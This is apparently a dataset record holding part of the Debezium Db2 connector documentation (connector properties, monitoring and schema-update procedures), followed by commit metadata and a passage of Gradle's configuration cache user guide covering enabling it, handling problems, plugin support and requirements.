You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero. When you specify zero, the connector replaces a value with an empty string.\n\n|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `+column.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +\n +\nFor each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThis property is useful for properly sizing corresponding columns in sink databases.\n\n|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +\n +\nFor these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +\n +\n`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +\n +\nThese parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +\n +\nSee {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.\n\n|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `+message.key.columns+`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +\n +\n_schema-name_._table-name_:_regexp_;... +\n +\nFor example, +\n +\n`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +\n +\nIf `table_a` has a an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.\n\n|===\n\n[id=\"db2-advanced-configuration-properties\"]\nThe following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n.Advanced connector configuration properties\n[cols=\"30%a,25%a,45%a\",options=\"header\"]\n|===\n|Property |Default |Description\n\n|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `+snapshot.mode+`>>\n|`initial`\n|Specifies the criteria for performing a snapshot when the connector starts: +\n +\n`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +\n +\n`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.\n\n|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>\n|`repeatable_read`\n|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +\n +\n`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +\n +\n`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +\n +\n`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.\n\n|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>\n|`fail`\n|Specifies how the connector handles exceptions during processing of events. The possible values are: +\n +\n`fail` - The connector logs the offset of the problematic event and stops processing. +\n +\n`warn` - The connector logs the offset of the problematic event and continues processing with the next event. +\n +\n`skip` - The connector skips the problematic event and continues processing with the next event.\n\n|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `+poll.interval.ms+`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `+max.queue.size+`>>\n|`8192`\n|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be or Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.\n\n|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `+max.batch.size+`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that the connector processes.\n\n|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>\n|`0`\n|Long value for the maximum size in bytes of the blocking queue. The feature is disabled by default, it will be active if it's set with a positive long value.\n\n|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +\n +\nHeartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.\n\n|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>\n|`__debezium-heartbeat`\n|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.\n\n|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors.\n\n|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>\n|`2000`\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>\n|`10000`\n|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +\n +\n`0` - The connector immediately fails when it cannot obtain a lock. +\n +\n`-1` - The connector waits infinitely.\n\n|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.\n\n|===\n\n[id=\"db2-pass-through-properties\"]\n.Pass-through connector configuration properties\n\nThe connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:\n\n * All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.\n\n * All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.\n\nFor example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].\n\nAlso, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-db2-connector-performance\n\/\/ Title: Monitoring {prodname} Db2 connector performance\n[[db2-monitoring]]\n== Monitoring\n\nThe {prodname} Db2 connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-db2-databases\n\/\/ Title: Monitoring {prodname} during snapshots of Db2 databases\n[[db2-monitoring-snapshots]]\n[[db2-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-record-streaming\n\/\/ Title: Monitoring {prodname} Db2 connector record streaming\n[[db2-monitoring-streaming]]\n[[db2-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-db2-connector-schema history\n\/\/ Title: Monitoring {prodname} Db2 connector schema history\n[[db2-monitoring-schema-history]]\n[[db2-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: managing-debezium-db2-connectors\n\/\/ Title: Managing {prodname} Db2 connectors\n[[db2-management]]\n== Management\n\nAfter you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value in which case you use the SQL `VALUE` statement to invoke them. For other UDFs, use the SQL `CALL` statement.\n\n.Descriptions of {prodname} management UDFs\n[cols=\"1,4\",options=\"header\"]\n|===\n|Task |Command and notes\n\n|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`\n\n|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`\n\n|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('status','asncdc');`\n\n|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>\n|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +\n +\nReplace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.\n\n|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>\n|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`\n\n|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>\n|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +\n +\nDo this after you put a table into capture mode or after you remove a table from capture mode.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors\n\/\/ Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors\n[[db2-schema-evolution]]\n== Schema evolution\n\nWhile a {prodname} Db2 connector can capture schema changes, to update a schema, you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.\n\nFor each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.\n\n[WARNING]\n====\nIt is vital to execute a schema update procedure completely before there is a new schema update on the same table. Consequently, the recommendation is to execute all DDLs in a single batch so the schema update procedure is done only once.\n====\n\nThere are generally two procedures for updating table schemas:\n\n* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]\n* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]\n\nEach approach has advantages and disadvantages.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing offline schema updates for {prodname} Db2 connectors\n[[db2-offline-schema-update]]\n=== Offline schema update\n\nYou stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure\n\n. Suspend the application that updates the database.\n. Wait for the {prodname} connector to stream all unstreamed change event records.\n. Stop the {prodname} connector.\n. Apply all changes to the source table schema.\n. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.\n. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].\n. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].\n. In the ASN register table, mark the updated source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Resume the application that updates the database.\n. Restart the {prodname} connector.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-online-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing online schema updates for {prodname} Db2 connectors\n[[db2-hot-schema-update]]\n=== Online schema update\n\nAn online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.\n\nHowever, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure when adding a column to the end of a table\n\n. Lock the source tables whose schema you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Apply all changes to the schemas for the source tables.\n. Apply all changes to the schemas for the corresponding change-data tables.\n. In the ASN register table, mark the source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n\n.Procedure when adding a column to the middle of a table\n\n. Lock the source table(s) to be changed.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. For each source table to be changed:\n.. Export the data in the source table.\n.. Truncate the source table.\n.. Alter the source table and add the column.\n.. Load the exported data into the altered source table.\n.. Export the data in the source table's corresponding change-data table.\n.. Truncate the change-data table.\n.. Alter the change-data table and add the column.\n.. Load the exported data into the altered change-data table.\n. In the ASN register table, mark the tables as `INACTIVE`. This marks the old change-data tables as inactive, which allows the data in them to remain but they are no longer updated.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25009870d36976a75abe5c7e48773743c6852835","subject":"Refine plugins support section","message":"Refine plugins support section\n\nSigned-off-by: Paul Merlin <a027184a55211cd23e3f3094f1fdc728df5e0500@gradle.com>\n","repos":"gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/configuration_cache.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/configuration_cache.adoc","new_contents":"[[config_cache]]\n= Configuration cache\n\n[NOTE]\n====\nThe configuration cache is an <<feature_lifecycle.adoc#feature_lifecycle,incubating>> feature, and the details described here may change.\n====\n\n\n== Introduction\n\nThe configuration cache is a feature that significantly improves build performance by caching the result of the <<build_lifecycle#build_lifecycle,configuration phase>> and reusing this for subsequent builds.\nUsing the configuration cache, Gradle can skip the configuration phase entirely when nothing that affects the build configuration, such as build scripts, has changed.\nGradle also applies some performance improvements to task execution as well.\n\nThe configuration cache is conceptually similar to the <<build_cache#build_cache,build cache>>, but caches different information.\nThe build cache takes care of caching the outputs and intermediate files of the build, such as task outputs or artifact transform outputs.\nThe configuration cache takes care of caching the build configuration for a particular set of tasks.\nIn other words, the configuration cache caches the output of the configuration phase, and the build cache caches the outputs of the execution phase.\n\n[IMPORTANT]\n====\nThis feature is currently *experimental* and not enabled by default.\n====\n\n=== How does it work?\n\nWhen the configuration cache is enabled and you run Gradle for a particular set of tasks, for example by running `gradlew check`, Gradle checks whether a configuration cache entry is available for the requested set of tasks.\nIf available, Gradle uses this entry instead of running the configuration phase.\nThe cache entry contains information about the set of tasks to run, along with their configuration and dependency information.\n\nThe first time you run a particular set of tasks, there will be no entry in the configuration cache for these tasks and so Gradle will run the configuration phase as normal:\n\n1. Run init scripts.\n2. Run the settings script for the build, applying any requested settings plugins.\n3. Configure and build the `buildSrc` project, if present.\n4. Run the builds scripts for the build, applying any requested project plugins.\n5. Calculate the task graph for the requested tasks, running any deferred configuration actions.\n\nFollowing the configuration phase, Gradle writes the state of the task graph to the configuration cache, taking a snapshot for later Gradle invocations.\nThe execution phase then runs as normal.\nThis means you will not see any build performance improvement the first time you run a particular set of tasks.\n\nWhen you subsequently run Gradle with this same set of tasks, for example by running `gradlew check` again, Gradle will load the tasks and their configuration directly from the configuration cache and skip the configuration phase entirely.\nBefore using a configuration cache entry, Gradle checks that none of the \"build inputs\", such as build scripts, for the entry have changed.\nIf a build input has changed, Gradle will not use the entry and will run the configuration phase again as above, saving the result for later reuse.\n\nBuild inputs include:\n\n- Init scripts, settings scripts, build scripts.\n- System properties, Gradle properties and configuration files used during the configuration phase, accessed using value suppliers (TODO - add docs for this).\n- build inputs and source files for `buildSrc` projects.\n\n=== Performance improvements\n\nApart from skipping the configuration phase, the configuration cache provides some additional performance improvements:\n\n- All tasks run in parallel by default.\n- Dependency resolution is cached.\n\n== Using the configuration cache\n\n[[enable]]\n=== Enabling the configuration cache\n\nBy default, the configuration cache is not enabled.\nIt can be enabled from the command line:\n\n[source,bash]\n----\n$ gradle --configuration-cache\n----\n\nIt can also be enabled persistently in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache=true\n----\n\nIf it is enabled in a `gradle.properties` file, it can be disabled on the command line for one build invocation:\n\n[source,bash]\n----\n$ gradle --no-configuration-cache\n----\n\n[[ignore_problems]]\n=== Ignoring problems\n\nBy default, Gradle will fail the build if any configuration cache problems are encountered.\nConfiguration cache problems can be turned into warnings on the command line:\n\n[source,bash]\n----\n$ gradle --configuration-cache-problems=warn\n----\n\nor in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache-problems=warn\n----\n\n[[max_problems]]\n=== Allowing a maximum number of problems\n\nWhen configuration cache problems are turned into warnings, Gradle will fail the build if `512` problems are found by default.\n\nThis can be adjusted by specifying an allowed maximum number of problems on the command line:\n\n[source,bash]\n----\n$ gradle -Dorg.gradle.unsafe.configuration-cache.max-problems=5\n----\n\nor in a `gradle.properties` file:\n\n[source,properties]\n----\norg.gradle.unsafe.configuration-cache.max-problems=5\n----\n\n=== Invalidating the cache\n\nThe configuration cache is automatically invalidated when inputs to the configuration phase change.\nBut, you may have to manually invalidate the configuration cache when untracked inputs to the configuration phase change.\nThis can happen if you <<configuration_cache#ignore_problems,ignored problems>>, or when remote dependencies changed for example.\nSee the <<configuration_cache#requirements>> and <<configuration_cache#not_yet_implemented>> sections below for more information.\n\nThe configuration cache state is stored on disk in a directory named `.gradle\/configuration-cache` in the root directory of the Gradle build in use.\nIf you need to invalidate the cache, simply delete that directory:\n\n[source,bash]\n----\n$ rm -rf .gradle\/configuration-cache\n----\n\nConfiguration cache entries are checked periodically (at most every 24 hours) for whether they are still in use.\nThey are deleted if they haven't been used for 7 days.\n\n[[plugin_support]]\n== Supported plugins\n\n=== Core Gradle plugins\n\nNot all <<plugin_reference#plugin_reference, core Gradle plugins>> support configuration caching yet.\n\n[cols=3*]\n|===\nh| JVM languages and frameworks\nh| Native languages\nh| Packaging and distribution\n\na|\n[horizontal]\n[.yellow]#\u26a0#:: <<java_plugin.adoc#java_plugin,Java>>\n[.yellow]#\u26a0#:: <<java_library_plugin.adoc#java_library_plugin,Java Library>>\n[.yellow]#\u26a0#:: <<java_platform_plugin.adoc#java_platform_plugin,Java Platform>>\n[.yellow]#\u26a0#:: <<groovy_plugin.adoc#groovy_plugin,Groovy>>\n[.red]#\u2716#:: <<scala_plugin.adoc#scala_plugin,Scala>>\n[.yellow]#\u26a0#:: <<antlr_plugin.adoc#antlr_plugin,ANTLR>>\n\na|\n[horizontal]\n[.red]#\u2716#:: <<cpp_application_plugin.adoc#cpp_application_plugin,C++ Application>>\n[.red]#\u2716#:: <<cpp_library_plugin.adoc#cpp_library_plugin,C++ Library>>\n[.red]#\u2716#:: <<cpp_unit_test_plugin.adoc#cpp_unit_test_plugin,C++ Unit Test>>\n[.red]#\u2716#:: <<swift_application_plugin.adoc#swift_application_plugin,Swift Application>>\n[.red]#\u2716#:: <<swift_library_plugin.adoc#swift_library_plugin,Swift Library>>\n[.red]#\u2716#:: <<xctest_plugin.adoc#xctest_plugin,XCTest>>\n\na|\n[horizontal]\n[.green]#\u2713#:: <<application_plugin.adoc#application_plugin,Application>>\n[.green]#\u2713#:: <<war_plugin.adoc#war_plugin,WAR>>\n[.green]#\u2713#:: <<ear_plugin.adoc#ear_plugin,EAR>>\n[.yellow]#\u26a0#:: <<publishing_maven.adoc#publishing_maven,Maven Publish>>\n[.red]#\u2716#:: <<publishing_ivy.adoc#publishing_ivy,Ivy Publish>>\n[.gray]#\u2716#:: <<maven_plugin.adoc#maven_plugin,Legacy Maven Plugin>>\n[.green]#\u2713#:: <<distribution_plugin.adoc#distribution_plugin,Distribution>>\n[.yellow]#\u26a0#:: <<java_library_distribution_plugin.adoc#java_library_distribution_plugin,Java Library Distribution>>\n\nh|\u00a0Code analysis\nh|\u00a0IDE integration\nh| Utility\n\na|\n[horizontal]\n[.red]#\u2716#:: <<checkstyle_plugin.adoc#checkstyle_plugin,Checkstyle>>\n[.red]#\u2716#:: <<pmd_plugin.adoc#pmd_plugin,PMD>>\n[.red]#\u2716#:: <<jacoco_plugin.adoc#jacoco_plugin,JaCoCo>>\n[.red]#\u2716#:: <<codenarc_plugin.adoc#codenarc_plugin,CodeNarc>>\n\na|\n[horizontal]\n[.red]#\u2716#:: <<eclipse_plugin.adoc#eclipse_plugin,Eclipse>>\n[.red]#\u2716#:: <<idea_plugin.adoc#idea_plugin,IntelliJ IDEA>>\n[.red]#\u2716#:: <<visual_studio_plugin.adoc#visual_studio_plugin,Visual Studio>>\n[.red]#\u2716#:: <<xcode_plugin.adoc#xcode_plugin,Xcode>>\n\na|\n[horizontal]\n[.green]#\u2713#:: <<base_plugin.adoc#base_plugin,Base>>\n[.yellow]#\u26a0#:: <<build_init_plugin.adoc#build_init_plugin,Build Init>>\n[.red]#\u2716#:: <<signing_plugin.adoc#signing_plugin,Signing>>\n[.yellow]#\u26a0#:: <<java_gradle_plugin.adoc#java_gradle_plugin,Plugin Development>>\n[.red]#\u2716#:: <<project_report_plugin.adoc#project_report_plugin,Project Report Plugin>>\n\n|===\n\n[horizontal]\n[.green]#\u2713#:: Supported plugin\n[.yellow]#\u26a0#:: Partially supported plugin\n[.red]#\u2716#:: Unsupported plugin\n[.gray]#\u2716#:: Won't fix\n\nLater Gradle releases will add support for more core plugins.\n\n[[troubleshooting]]\n== Troubleshooting\n\nUpon failure to serialize the state required to run the tasks, an HTML report of detected problems is generated.\nThe Gradle failure output includes a clickable link to the report.\n\n\/\/ TODO sample output from snippet\n\nThe report displays the set of problems twice.\nFirst grouped by problem message, then grouped by task.\nThe former allows to quickly see what classes of problems your build is facing.\nThe latter allows to quickly see which tasks are problematic.\nIn both cases you can expand the tree in order to discover where in the object graph is the culprit.\n\n[TIP]\n====\nProblems displayed in the report have links to the corresponding <<configuration_cache#requirements,requirement>> where you can find guidance on how to fix the problem or to the corresponding <<configuration_cache#not_yet_implemented,not yet implemented>> feature.\n\nWhen changing your build or plugin to fix the problems you should consider <<configuration_cache#testkit, testing your build logic with TestKit>>.\n====\n\n[[requirements]]\n== Requirements\n\nIn order to capture the state of the task graph to the configuration cache and reload it again in a later build, Gradle applies certain requirements to tasks and other build logic.\nEach of these requirements is treated as a configuration cache \"problem\" and fail the build if violations are present.\n\nThe following sections describe each of the requirements and how to change your build to fix the problems.\n\n[[disallowed_types]]\n=== Certain types must not be referenced by tasks\n\nThere are a number of types that task instances must not reference from their fields.\nUsually these types are used to carry some task input that should be explicitly declared instead.\n\nTo fix, you can often replace such a field with a `Property` or `Provider` typed field that exposes the exact information that the task will need at execution time.\n\n\/\/ TODO - examples, more details\n\n[[use_project_during_execution]]\n=== Using the `Project` object\n\nA task must not use any `Project` objects at execution time.\nThis includes calling `Task.getProject()` while the task is running.\n\nSome cases can be fixed in the same way as the previous requirement.\n\nOften, similar things are available on both `Project` and `Task.\nFor example if you need a `Logger` in your task actions you should use `Task.logger` instead of `Project.logger`.\n\nOtherwise, to fix, use <<custom_gradle_types#service_injection,injected services>> instead of the methods of `Project`:\n\n* `project.file(path)` -> `ProjectLayout.projectDirectory.file(path)` or `ProjectLayout.buildDirectory.file(path)`\n* `project.files(paths)` -> `ObjectFactory.fileCollection().from(paths)`\n* `project.fileTree(dir)` -> `ObjectFactory.fileTree().from(dir)`\n* `project.exec {}` -> `ExecOperations.exec {}`\n* `project.javaexec {}` -> `ExecOperations.javaexec {}`\n* `project.copy {}` -> `FileSystemOperations.copy {}`\n* `project.sync {}` -> 